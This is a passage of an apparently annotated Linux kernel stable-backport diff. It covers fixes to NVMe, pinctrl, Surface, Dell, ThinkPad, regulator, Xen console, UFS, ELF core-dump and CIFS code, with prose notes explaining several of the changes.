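	static int send_and_wait(struct urb *urb)
	{
		struct out_arg arg;
		void *old = urb->context;
		int rc;

		init_completion(&arg.done);
		urb->context = &arg;
		rc = usb_submit_urb(urb, GFP_KERNEL);
		if (rc == 0)
			wait_for_completion(&arg.done);
		urb->context = old;
		return rc;
	}

Worth noting: as backported above, pn533_out_complete() reads arg->phy for its error prints, but the send path never assigns arg.phy, so that pointer is uninitialized; if memory serves, a later upstream follow-up adds the missing `arg.phy = phy` assignment.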
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index 7e025b8948cbf..d09ed00701743 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -351,6 +351,8 @@ static void nvme_ns_head_submit_bio(struct bio *bio)
+ 	 * pool from the original queue to allocate the bvecs from.
+ 	 */
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	srcu_idx = srcu_read_lock(&head->srcu);
+ 	ns = nvme_find_path(head);
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 6be8968717182..9bc6e3922e78e 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -628,13 +628,15 @@ static bool do_amd_gpio_irq_handler(int irq, void *dev_id)
+ 		/* Each status bit covers four pins */
+ 		for (i = 0; i < 4; i++) {
+ 			regval = readl(regs + i);
+-			/* caused wake on resume context for shared IRQ */
+-			if (irq < 0 && (regval & BIT(WAKE_STS_OFF))) {
++
++			if (regval & PIN_IRQ_PENDING)
+ 				dev_dbg(&gpio_dev->pdev->dev,
+-					"Waking due to GPIO %d: 0x%x",
++					"GPIO %d is active: 0x%x",
+ 					irqnr + i, regval);
++
++			/* caused wake on resume context for shared IRQ */
++			if (irq < 0 && (regval & BIT(WAKE_STS_OFF)))
+ 				return true;
+-			}
+ 
+ 			if (!(regval & PIN_IRQ_PENDING) ||
+ 			    !(regval & BIT(INTERRUPT_MASK_OFF)))
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index 43e7651991371..c6537a1b3a2ec 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -1700,8 +1700,10 @@ int ssam_request_sync(struct ssam_controller *ctrl,
+ 		return status;
+ 
+ 	status = ssam_request_sync_init(rqst, spec->flags);
+-	if (status)
++	if (status) {
++		ssam_request_sync_free(rqst);
+ 		return status;
++	}
+ 
+ 	ssam_request_sync_set_resp(rqst, rsp);
+ 
+diff --git a/drivers/platform/surface/aggregator/ssh_request_layer.c b/drivers/platform/surface/aggregator/ssh_request_layer.c
+index f5565570f16c7..69132976d297e 100644
+--- a/drivers/platform/surface/aggregator/ssh_request_layer.c
++++ b/drivers/platform/surface/aggregator/ssh_request_layer.c
+@@ -916,6 +916,20 @@ static void ssh_rtl_rx_command(struct ssh_ptl *p, const struct ssam_span *data)
+ 	if (sshp_parse_command(dev, data, &command, &command_data))
+ 		return;
+ 
++	/*
++	 * Check if the message was intended for us. If not, drop it.
++	 *
++	 * Note: We will need to change this to handle debug messages. On newer
++	 * generation devices, these seem to be sent to tid_out=0x03. We as
++	 * host can still receive them as they can be forwarded via an override
++	 * option on SAM, but doing so does not change tid_out=0x00.
++	 */
++	if (command->tid_out != 0x00) {
++		rtl_warn(rtl, "rtl: dropping message not intended for us (tid = %#04x)\n",
++			 command->tid_out);
++		return;
++	}
++
+ 	if (ssh_rqid_is_event(get_unaligned_le16(&command->rqid)))
+ 		ssh_rtl_rx_event(rtl, command, &command_data);
+ 	else
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 439d282aafd19..8d924986381be 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -932,7 +932,7 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 	if (enable_stb && (dev->cpu_id == AMD_CPU_ID_YC || dev->cpu_id == AMD_CPU_ID_CB)) {
+ 		err = amd_pmc_s2d_init(dev);
+ 		if (err)
+-			return err;
++			goto err_pci_dev_put;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, dev);
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 872efc1d5b36b..f051b21653d61 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -2436,6 +2436,9 @@ static int fan_curve_check_present(struct asus_wmi *asus, bool *available,
+ 
+ 	*available = false;
+ 
++	if (asus->fan_type == FAN_TYPE_NONE)
++		return 0;
++
+ 	err = fan_curve_get_factory_default(asus, fan_dev);
+ 	if (err) {
+ 		return 0;
+diff --git a/drivers/platform/x86/dell/dell-wmi-privacy.c b/drivers/platform/x86/dell/dell-wmi-privacy.c
+index c82b3d6867c5b..c517bd45dd32e 100644
+--- a/drivers/platform/x86/dell/dell-wmi-privacy.c
++++ b/drivers/platform/x86/dell/dell-wmi-privacy.c
+@@ -61,7 +61,7 @@ static const struct key_entry dell_wmi_keymap_type_0012[] = {
+ 	/* privacy mic mute */
+ 	{ KE_KEY, 0x0001, { KEY_MICMUTE } },
+ 	/* privacy camera mute */
+-	{ KE_SW,  0x0002, { SW_CAMERA_LENS_COVER } },
++	{ KE_VSW, 0x0002, { SW_CAMERA_LENS_COVER } },
+ 	{ KE_END, 0},
+ };
+ 
+@@ -115,11 +115,15 @@ bool dell_privacy_process_event(int type, int code, int status)
+ 
+ 	switch (code) {
+ 	case DELL_PRIVACY_AUDIO_EVENT: /* Mic mute */
+-	case DELL_PRIVACY_CAMERA_EVENT: /* Camera mute */
+ 		priv->last_status = status;
+ 		sparse_keymap_report_entry(priv->input_dev, key, 1, true);
+ 		ret = true;
+ 		break;
++	case DELL_PRIVACY_CAMERA_EVENT: /* Camera mute */
++		priv->last_status = status;
++		sparse_keymap_report_entry(priv->input_dev, key, !(status & CAMERA_STATUS), false);
++		ret = true;
++		break;
+ 	default:
+ 		dev_dbg(&priv->wdev->dev, "unknown event type 0x%04x 0x%04x\n", type, code);
+ 	}
+@@ -292,7 +296,7 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ {
+ 	struct privacy_wmi_data *priv;
+ 	struct key_entry *keymap;
+-	int ret, i;
++	int ret, i, j;
+ 
+ 	ret = wmi_has_guid(DELL_PRIVACY_GUID);
+ 	if (!ret)
+@@ -304,6 +308,11 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 
+ 	dev_set_drvdata(&wdev->dev, priv);
+ 	priv->wdev = wdev;
++
++	ret = get_current_status(priv->wdev);
++	if (ret)
++		return ret;
++
+ 	/* create evdev passing interface */
+ 	priv->input_dev = devm_input_allocate_device(&wdev->dev);
+ 	if (!priv->input_dev)
+@@ -318,9 +327,20 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	/* remap the keymap code with Dell privacy key type 0x12 as prefix
+ 	 * KEY_MICMUTE scancode will be reported as 0x120001
+ 	 */
+-	for (i = 0; i < ARRAY_SIZE(dell_wmi_keymap_type_0012); i++) {
+-		keymap[i] = dell_wmi_keymap_type_0012[i];
+-		keymap[i].code |= (0x0012 << 16);
++	for (i = 0, j = 0; i < ARRAY_SIZE(dell_wmi_keymap_type_0012); i++) {
++		/*
++		 * Unlike keys where only presses matter, userspace may act
++		 * on switches in both of their positions. Only register
++		 * SW_CAMERA_LENS_COVER if it is actually there.
++		 */
++		if (dell_wmi_keymap_type_0012[i].type == KE_VSW &&
++		    dell_wmi_keymap_type_0012[i].sw.code == SW_CAMERA_LENS_COVER &&
++		    !(priv->features_present & BIT(DELL_PRIVACY_TYPE_CAMERA)))
++			continue;
++
++		keymap[j] = dell_wmi_keymap_type_0012[i];
++		keymap[j].code |= (0x0012 << 16);
++		j++;
+ 	}
+ 	ret = sparse_keymap_setup(priv->input_dev, keymap, NULL);
+ 	kfree(keymap);
+@@ -331,11 +351,12 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	priv->input_dev->name = "Dell Privacy Driver";
+ 	priv->input_dev->id.bustype = BUS_HOST;
+ 
+-	ret = input_register_device(priv->input_dev);
+-	if (ret)
+-		return ret;
++	/* Report initial camera-cover status */
++	if (priv->features_present & BIT(DELL_PRIVACY_TYPE_CAMERA))
++		input_report_switch(priv->input_dev, SW_CAMERA_LENS_COVER,
++				    !(priv->last_status & CAMERA_STATUS));
+ 
+-	ret = get_current_status(priv->wdev);
++	ret = input_register_device(priv->input_dev);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index fc3d47a759443..4e28c55f0ea52 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1615,6 +1615,12 @@ static const struct dmi_system_id set_fn_lock_led_list[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "Lenovo Legion R7000P2020H"),
+ 		}
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Lenovo Legion 5 15ARH05"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/platform/x86/intel/int3472/clk_and_regulator.c b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+index b2342b3d78c72..74dc2cff799ee 100644
+--- a/drivers/platform/x86/intel/int3472/clk_and_regulator.c
++++ b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+@@ -181,6 +181,9 @@ int skl_int3472_register_regulator(struct int3472_discrete_device *int3472,
+ 		return PTR_ERR(int3472->regulator.gpio);
+ 	}
+ 
++	/* Ensure the pin is in output mode and non-active state */
++	gpiod_direction_output(int3472->regulator.gpio, 0);
++
+ 	cfg.dev = &int3472->adev->dev;
+ 	cfg.init_data = &init_data;
+ 	cfg.ena_gpiod = int3472->regulator.gpio;
+diff --git a/drivers/platform/x86/intel/int3472/discrete.c b/drivers/platform/x86/intel/int3472/discrete.c
+index 974a132db6516..c42c3faa2c32d 100644
+--- a/drivers/platform/x86/intel/int3472/discrete.c
++++ b/drivers/platform/x86/intel/int3472/discrete.c
+@@ -168,6 +168,8 @@ static int skl_int3472_map_gpio_to_clk(struct int3472_discrete_device *int3472,
+ 			return (PTR_ERR(gpio));
+ 
+ 		int3472->clock.ena_gpio = gpio;
++		/* Ensure the pin is in output mode and non-active state */
++		gpiod_direction_output(int3472->clock.ena_gpio, 0);
+ 		break;
+ 	case INT3472_GPIO_TYPE_PRIVACY_LED:
+ 		gpio = acpi_get_and_request_gpiod(path, pin, "int3472,privacy-led");
+@@ -175,6 +177,8 @@ static int skl_int3472_map_gpio_to_clk(struct int3472_discrete_device *int3472,
+ 			return (PTR_ERR(gpio));
+ 
+ 		int3472->clock.led_gpio = gpio;
++		/* Ensure the pin is in output mode and non-active state */
++		gpiod_direction_output(int3472->clock.led_gpio, 0);
+ 		break;
+ 	default:
+ 		dev_err(int3472->dev, "Invalid GPIO type 0x%02x for clock\n", type);
+diff --git a/drivers/platform/x86/sony-laptop.c b/drivers/platform/x86/sony-laptop.c
+index 765fcaba4d121..5ff5aaf92b56e 100644
+--- a/drivers/platform/x86/sony-laptop.c
++++ b/drivers/platform/x86/sony-laptop.c
+@@ -1888,14 +1888,21 @@ static int sony_nc_kbd_backlight_setup(struct platform_device *pd,
+ 		break;
+ 	}
+ 
+-	ret = sony_call_snc_handle(handle, probe_base, &result);
+-	if (ret)
+-		return ret;
++	/*
++	 * Only probe if there is a separate probe_base, otherwise the probe call
++	 * is equivalent to __sony_nc_kbd_backlight_mode_set(0), resulting in
++	 * the keyboard backlight being turned off.
++	 */
++	if (probe_base) {
++		ret = sony_call_snc_handle(handle, probe_base, &result);
++		if (ret)
++			return ret;
+ 
+-	if ((handle == 0x0137 && !(result & 0x02)) ||
+-			!(result & 0x01)) {
+-		dprintk("no backlight keyboard found\n");
+-		return 0;
++		if ((handle == 0x0137 && !(result & 0x02)) ||
++				!(result & 0x01)) {
++			dprintk("no backlight keyboard found\n");
++			return 0;
++		}
+ 	}
+ 
+ 	kbdbl_ctl = kzalloc(sizeof(*kbdbl_ctl), GFP_KERNEL);
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index a1d91736a03b8..4e95d2243161a 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10315,9 +10315,11 @@ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
+ 
+-static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *profile)
++static int convert_dytc_to_profile(int funcmode, int dytcmode,
++		enum platform_profile_option *profile)
+ {
+-	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
++	switch (funcmode) {
++	case DYTC_FUNCTION_MMC:
+ 		switch (dytcmode) {
+ 		case DYTC_MODE_MMC_LOWPOWER:
+ 			*profile = PLATFORM_PROFILE_LOW_POWER;
+@@ -10333,8 +10335,7 @@ static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *p
+ 			return -EINVAL;
+ 		}
+ 		return 0;
+-	}
+-	if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
++	case DYTC_FUNCTION_PSC:
+ 		switch (dytcmode) {
+ 		case DYTC_MODE_PSC_LOWPOWER:
+ 			*profile = PLATFORM_PROFILE_LOW_POWER;
+@@ -10348,6 +10349,14 @@ static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *p
+ 		default: /* Unknown mode */
+ 			return -EINVAL;
+ 		}
++		return 0;
++	case DYTC_FUNCTION_AMT:
++		/* For now return balanced. It's the closest we have to 'auto' */
++		*profile =  PLATFORM_PROFILE_BALANCED;
++		return 0;
++	default:
++		/* Unknown function */
++		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+ }
+@@ -10496,6 +10505,7 @@ static int dytc_profile_set(struct platform_profile_handler *pprof,
+ 		err = dytc_command(DYTC_SET_COMMAND(DYTC_FUNCTION_PSC, perfmode, 1), &output);
+ 		if (err)
+ 			goto unlock;
++
+ 		/* system supports AMT, activate it when on balanced */
+ 		if (dytc_capabilities & BIT(DYTC_FC_AMT))
+ 			dytc_control_amt(profile == PLATFORM_PROFILE_BALANCED);
+@@ -10511,7 +10521,7 @@ static void dytc_profile_refresh(void)
+ {
+ 	enum platform_profile_option profile;
+ 	int output, err = 0;
+-	int perfmode;
++	int perfmode, funcmode;
+ 
+ 	mutex_lock(&dytc_mutex);
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
+@@ -10526,8 +10536,9 @@ static void dytc_profile_refresh(void)
+ 	if (err)
+ 		return;
+ 
++	funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+-	convert_dytc_to_profile(perfmode, &profile);
++	convert_dytc_to_profile(funcmode, perfmode, &profile);
+ 	if (profile != dytc_current_profile) {
+ 		dytc_current_profile = profile;
+ 		platform_profile_notify();
+diff --git a/drivers/regulator/da9211-regulator.c b/drivers/regulator/da9211-regulator.c
+index e01b32d1fa17d..00828f5baa972 100644
+--- a/drivers/regulator/da9211-regulator.c
++++ b/drivers/regulator/da9211-regulator.c
+@@ -498,6 +498,12 @@ static int da9211_i2c_probe(struct i2c_client *i2c)
+ 
+ 	chip->chip_irq = i2c->irq;
+ 
++	ret = da9211_regulator_init(chip);
++	if (ret < 0) {
++		dev_err(chip->dev, "Failed to initialize regulator: %d\n", ret);
++		return ret;
++	}
++
+ 	if (chip->chip_irq != 0) {
+ 		ret = devm_request_threaded_irq(chip->dev, chip->chip_irq, NULL,
+ 					da9211_irq_handler,
+@@ -512,11 +518,6 @@ static int da9211_i2c_probe(struct i2c_client *i2c)
+ 		dev_warn(chip->dev, "No IRQ configured\n");
+ 	}
+ 
+-	ret = da9211_regulator_init(chip);
+-
+-	if (ret < 0)
+-		dev_err(chip->dev, "Failed to initialize regulator: %d\n", ret);
+-
+ 	return ret;
+ }
+ 
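The da9211 reorder makes the regulator initialization happen before the threaded IRQ is requested, so the handler can never run against a half-initialized chip, and an init failure now actually aborts the probe instead of merely being logged. The generic shape, with foo_* as placeholders:

	static int foo_probe(struct i2c_client *i2c)
	{
		struct foo_chip *chip = foo_alloc(i2c);
		int ret;

		if (!chip)
			return -ENOMEM;

		/* bring the device to a sane state first ... */
		ret = foo_hw_init(chip);
		if (ret < 0)
			return ret;

		/* ... then install the handler, which may fire at once */
		return devm_request_threaded_irq(&i2c->dev, i2c->irq, NULL,
						 foo_irq_handler, IRQF_ONESHOT,
						 "foo", chip);
	}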
+diff --git a/drivers/s390/block/dcssblk.c b/drivers/s390/block/dcssblk.c
+index b392b9f5482e0..c0f85ffb2b62d 100644
+--- a/drivers/s390/block/dcssblk.c
++++ b/drivers/s390/block/dcssblk.c
+@@ -865,6 +865,8 @@ dcssblk_submit_bio(struct bio *bio)
+ 	unsigned long bytes_done;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	bytes_done = 0;
+ 	dev_info = bio->bi_bdev->bd_disk->private_data;
+diff --git a/drivers/scsi/mpi3mr/Makefile b/drivers/scsi/mpi3mr/Makefile
+index ef86ca46646b8..3bf8cf34e1c3f 100644
+--- a/drivers/scsi/mpi3mr/Makefile
++++ b/drivers/scsi/mpi3mr/Makefile
+@@ -1,5 +1,5 @@
+ # mpi3mr makefile
+-obj-m += mpi3mr.o
++obj-$(CONFIG_SCSI_MPI3MR) += mpi3mr.o
+ mpi3mr-y +=  mpi3mr_os.o     \
+ 		mpi3mr_fw.o \
+ 		mpi3mr_app.o \
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 3c5b7e4227b25..55d6fb4526804 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1823,6 +1823,9 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 	ret = storvsc_do_io(dev, cmd_request, get_cpu());
+ 	put_cpu();
+ 
++	if (ret)
++		scsi_dma_unmap(scmnd);
++
+ 	if (ret == -EAGAIN) {
+ 		/* no more space */
+ 		ret = SCSI_MLQUEUE_DEVICE_BUSY;
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 7c23112dc923f..37809c6c027fc 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -52,17 +52,22 @@ static DEFINE_SPINLOCK(xencons_lock);
+ 
+ static struct xencons_info *vtermno_to_xencons(int vtermno)
+ {
+-	struct xencons_info *entry, *n, *ret = NULL;
++	struct xencons_info *entry, *ret = NULL;
++	unsigned long flags;
+ 
+-	if (list_empty(&xenconsoles))
+-			return NULL;
++	spin_lock_irqsave(&xencons_lock, flags);
++	if (list_empty(&xenconsoles)) {
++		spin_unlock_irqrestore(&xencons_lock, flags);
++		return NULL;
++	}
+ 
+-	list_for_each_entry_safe(entry, n, &xenconsoles, list) {
++	list_for_each_entry(entry, &xenconsoles, list) {
+ 		if (entry->vtermno == vtermno) {
+ 			ret  = entry;
+ 			break;
+ 		}
+ 	}
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return ret;
+ }
+@@ -223,7 +228,7 @@ static int xen_hvm_console_init(void)
+ {
+ 	int r;
+ 	uint64_t v = 0;
+-	unsigned long gfn;
++	unsigned long gfn, flags;
+ 	struct xencons_info *info;
+ 
+ 	if (!xen_hvm_domain())
+@@ -258,9 +263,9 @@ static int xen_hvm_console_init(void)
+ 		goto err;
+ 	info->vtermno = HVC_COOKIE;
+ 
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ err:
+@@ -283,6 +288,7 @@ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ static int xen_pv_console_init(void)
+ {
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	if (!xen_pv_domain())
+ 		return -ENODEV;
+@@ -299,9 +305,9 @@ static int xen_pv_console_init(void)
+ 		/* already configured */
+ 		return 0;
+ 	}
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	xencons_info_pv_init(info, HVC_COOKIE);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -309,6 +315,7 @@ static int xen_pv_console_init(void)
+ static int xen_initial_domain_console_init(void)
+ {
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	if (!xen_initial_domain())
+ 		return -ENODEV;
+@@ -323,9 +330,9 @@ static int xen_initial_domain_console_init(void)
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+ 	info->vtermno = HVC_COOKIE;
+ 
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -380,10 +387,12 @@ static void xencons_free(struct xencons_info *info)
+ 
+ static int xen_console_remove(struct xencons_info *info)
+ {
++	unsigned long flags;
++
+ 	xencons_disconnect_backend(info);
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_del(&info->list);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 	if (info->xbdev != NULL)
+ 		xencons_free(info);
+ 	else {
+@@ -464,6 +473,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ {
+ 	int ret, devid;
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	devid = dev->nodename[strlen(dev->nodename) - 1] - '0';
+ 	if (devid == 0)
+@@ -482,9 +492,9 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	ret = xencons_connect_backend(dev, info);
+ 	if (ret < 0)
+ 		goto error;
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ 
+@@ -584,10 +594,12 @@ static int __init xen_hvc_init(void)
+ 
+ 	info->hvc = hvc_alloc(HVC_COOKIE, info->irq, ops, 256);
+ 	if (IS_ERR(info->hvc)) {
++		unsigned long flags;
++
+ 		r = PTR_ERR(info->hvc);
+-		spin_lock(&xencons_lock);
++		spin_lock_irqsave(&xencons_lock, flags);
+ 		list_del(&info->list);
+-		spin_unlock(&xencons_lock);
++		spin_unlock_irqrestore(&xencons_lock, flags);
+ 		if (info->irq)
+ 			unbind_from_irqhandler(info->irq, NULL);
+ 		kfree(info);
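
The hvc_xen hunks fix two problems at once: vtermno_to_xencons() walked the console list with no lock at all (the list_empty() pre-check offered no protection against a concurrent probe or remove), and every writer used plain spin_lock() even though these paths can run with interrupts already disabled. The _irqsave/_irqrestore pair saves and restores the previous interrupt state instead of unconditionally re-enabling IRQs on unlock. The idiom, as a generic sketch (kernel context assumed; struct item is invented):

    static DEFINE_SPINLOCK(example_lock);
    static LIST_HEAD(example_list);

    static struct item *example_find(int id)
    {
        struct item *entry, *ret = NULL;
        unsigned long flags;

        spin_lock_irqsave(&example_lock, flags);    /* safe in any context */
        list_for_each_entry(entry, &example_list, list) {
            if (entry->id == id) {
                ret = entry;
                break;
            }
        }
        spin_unlock_irqrestore(&example_lock, flags);   /* restores prior IRQ state */
        return ret;
    }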
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index d1db6be801560..b048357d21e36 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6094,6 +6094,14 @@ void ufshcd_schedule_eh_work(struct ufs_hba *hba)
+ 	}
+ }
+ 
++static void ufshcd_force_error_recovery(struct ufs_hba *hba)
++{
++	spin_lock_irq(hba->host->host_lock);
++	hba->force_reset = true;
++	ufshcd_schedule_eh_work(hba);
++	spin_unlock_irq(hba->host->host_lock);
++}
++
+ static void ufshcd_clk_scaling_allow(struct ufs_hba *hba, bool allow)
+ {
+ 	down_write(&hba->clk_scaling_lock);
+@@ -9066,6 +9074,15 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 
+ 		if (!hba->dev_info.b_rpm_dev_flush_capable) {
+ 			ret = ufshcd_set_dev_pwr_mode(hba, req_dev_pwr_mode);
++			if (ret && pm_op != UFS_SHUTDOWN_PM) {
++				/*
++				 * If an error is returned in the suspend flow,
++				 * I/O will hang. Trigger the error handler and
++				 * abort suspend so error recovery can run.
++				 */
++				ufshcd_force_error_recovery(hba);
++				ret = -EBUSY;
++			}
+ 			if (ret)
+ 				goto enable_scaling;
+ 		}
+@@ -9077,6 +9094,15 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 	 */
+ 	check_for_bkops = !ufshcd_is_ufs_dev_deepsleep(hba);
+ 	ret = ufshcd_link_state_transition(hba, req_link_state, check_for_bkops);
++	if (ret && pm_op != UFS_SHUTDOWN_PM) {
++		/*
++		 * If an error is returned in the suspend flow,
++		 * I/O will hang. Trigger the error handler and
++		 * abort suspend so error recovery can run.
++		 */
++		ufshcd_force_error_recovery(hba);
++		ret = -EBUSY;
++	}
+ 	if (ret)
+ 		goto set_dev_active;
+ 
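
Both UFS suspend-time failure points now funnel through the new ufshcd_force_error_recovery() helper, which sets force_reset under the host lock and schedules the error handler. Returning -EBUSY instead of the raw error then aborts the suspend attempt so queued I/O is not left hanging behind a half-suspended device while the scheduled handler recovers the link. Condensed shape of the bail-out (names as in the patch):

    ret = ufshcd_set_dev_pwr_mode(hba, req_dev_pwr_mode);
    if (ret && pm_op != UFS_SHUTDOWN_PM) {
        ufshcd_force_error_recovery(hba);   /* arm eh_work with force_reset set */
        ret = -EBUSY;                       /* abort suspend; recovery runs async */
    }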
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index 6a11025e58502..444302afc673a 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -2209,7 +2209,7 @@ static int elf_core_dump(struct coredump_params *cprm)
+ 	 * The number of segs is recorded in the ELF header as a 16-bit value.
+ 	 * Please check the DEFAULT_MAX_MAP_COUNT definition when modifying here.
+ 	 */
+-	segs = cprm->vma_count + elf_core_extra_phdrs();
++	segs = cprm->vma_count + elf_core_extra_phdrs(cprm);
+ 
+ 	/* for notes section */
+ 	segs++;
+@@ -2249,7 +2249,7 @@ static int elf_core_dump(struct coredump_params *cprm)
+ 	dataoff = offset = roundup(offset, ELF_EXEC_PAGESIZE);
+ 
+ 	offset += cprm->vma_data_size;
+-	offset += elf_core_extra_data_size();
++	offset += elf_core_extra_data_size(cprm);
+ 	e_shoff = offset;
+ 
+ 	if (e_phnum == PN_XNUM) {
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 9ce5e1f41c26f..069f12cc7634c 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -1509,7 +1509,7 @@ static int elf_fdpic_core_dump(struct coredump_params *cprm)
+ 	tmp->next = thread_list;
+ 	thread_list = tmp;
+ 
+-	segs = cprm->vma_count + elf_core_extra_phdrs();
++	segs = cprm->vma_count + elf_core_extra_phdrs(cprm);
+ 
+ 	/* for notes section */
+ 	segs++;
+@@ -1555,7 +1555,7 @@ static int elf_fdpic_core_dump(struct coredump_params *cprm)
+ 	dataoff = offset = roundup(offset, ELF_EXEC_PAGESIZE);
+ 
+ 	offset += cprm->vma_data_size;
+-	offset += elf_core_extra_data_size();
++	offset += elf_core_extra_data_size(cprm);
+ 	e_shoff = offset;
+ 
+ 	if (e_phnum == PN_XNUM) {
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 7e7f712f97fd8..fde1c371605a1 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2609,11 +2609,14 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	INIT_LIST_HEAD(&tcon->pending_opens);
+ 	tcon->status = TID_GOOD;
+ 
+-	/* schedule query interfaces poll */
+ 	INIT_DELAYED_WORK(&tcon->query_interfaces,
+ 			  smb2_query_server_interfaces);
+-	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	if (ses->server->dialect >= SMB30_PROT_ID &&
++	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		/* schedule query interfaces poll */
++		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	}
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_add(&tcon->tcon_list, &ses->tcon_list);
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index bd374feeccaa1..a5a097a699837 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
